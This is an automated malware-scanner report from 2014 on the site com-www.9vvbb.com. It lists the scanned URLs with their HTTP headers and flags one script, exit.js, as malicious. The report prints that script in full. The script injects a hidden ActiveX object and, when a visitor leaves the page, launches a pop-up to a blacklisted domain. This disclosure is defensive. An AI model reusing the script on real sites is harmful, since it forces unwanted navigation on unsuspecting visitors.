New scan:

Malware Scanner report for com-www.9vvbb.com

Malicious/Suspicious/Total urls checked
1/0/18
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "com-www.9vvbb.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=com-www.9vvbb.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://com-www.9vvbb.com/
HTTP/1.1 200 OK
Date: Wed, 13 Aug 2014 08:45:46 GMT
Accept-Ranges: bytes
ETag: "8655e645b5a8cf1:2d3"
Server: Microsoft-IIS/6.0
Content-Length: 9902
Content-Location: http://com-www.9vvbb.com/index.html
Content-Type: text/html
Last-Modified: Sat, 26 Jul 2014 09:37:53 GMT
X-Powered-By: ASP.NET
clean
http://com-www.9vvbb.com/index.html
200 OK
Content-Length: 9902
Content-Type: text/html
clean
http://com-www.9vvbb.com/exit.js
200 OK
Content-Length: 481
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: www.9vvbb.com

var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
function ext() {
if (window.event.clientY < 132 || altKey) iie.launchURL(popURL);
}
function brs() {
document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>";
}

var popURL = 'http://www.9vvbb.com/dianying/default.htm'; eval("window.attachEvent('onload',brs);");
eval("window.attachEvent('onunload',ext);");

Decoded script:


window.attachEvent('onload',brs);
window.attachEvent('onload',brs);
function brs() {
document.body.innerHTML += "<object id=iie width=0 height=0 classid='CLSID:" + u + "'></object>";
}
window.attachEvent('onunload',ext);
window.attachEvent('onunload',ext);
function ext() {
if (window.event.clientY < 132 || altKey) {
iie.launchURL(popURL);
}
}

http://e.ku63.com/js/cpc_wz_tw_stxw.js
200 OK
Content-Length: 1448
Content-Type: application/x-javascript
clean
http://e.ku63.com/js/cpc_wz_tw_stxw_fd.js
200 OK
Content-Length: 6207
Content-Type: application/x-javascript
clean
http://t.ku63.com/t.asp?u=36166&t=3&m=4&n=
200 OK
Content-Length: 229
Content-Type: text/html
clean
http://t.ku63.com/js/t_20140331.js
200 OK
Content-Length: 12353
Content-Type: application/x-javascript
clean
http://t.ku63.com/test404page.js
HTTP/1.1 302 Redirect
Date: Wed, 13 Aug 2014 08:45:39 GMT
Location: http://www.70e.com/err/404.html
Server: Microsoft-IIS/7.5
Content-Length: 154
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
clean
http://www.70e.com/err/404.html
200 OK
Content-Length: 271
Content-Type: text/html
clean
http://www.70e.com/
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Wed, 13 Aug 2014 08:45:41 GMT
Location: index.html
Server: Microsoft-IIS/7.5
Content-Length: 108
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCACTDQB=IMGPGEGBOBCOFPJLKKBPELKL; path=/
X-Powered-By: ASP.NET
clean
http://www.70e.com/index.html
200 OK
Content-Length: 6819
Content-Type: text/html
clean
http://www.70e.com/s_js/interface.js
200 OK
Content-Length: 396
Content-Type: application/x-javascript
clean
http://www.70e.com/../index.html
403 Forbidden
Content-Length: 312
Content-Type: text/html
clean
http://www.70e.com/test404page.js
200 OK
Content-Length: 271
Content-Type: text/html
clean
http://www.70e.com/../Webmaster.html
403 Forbidden
Content-Length: 312
Content-Type: text/html
clean
http://www.70e.com/../Advertisers.html
403 Forbidden
Content-Length: 312
Content-Type: text/html
clean
http://www.70e.com/../NoticeList/index.html
403 Forbidden
Content-Length: 312
Content-Type: text/html
clean
http://www.70e.com/HD.html
200 OK
Content-Length: 5243
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: com-www.9vvbb.com

Result:
HTTP/1.1 200 OK
Date: Wed, 13 Aug 2014 08:45:46 GMT
Accept-Ranges: bytes
ETag: "8655e645b5a8cf1:2d3"
Server: Microsoft-IIS/6.0
Content-Length: 9902
Content-Location: http://com-www.9vvbb.com/index.html
Content-Type: text/html
Last-Modified: Sat, 26 Jul 2014 09:37:53 GMT
X-Powered-By: ASP.NET

...9902 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: com-www.9vvbb.com
Referer: http://www.google.com/search?q=com-www.9vvbb.com

Result:
The result is similar to the first query. There are no suspicious redirects found.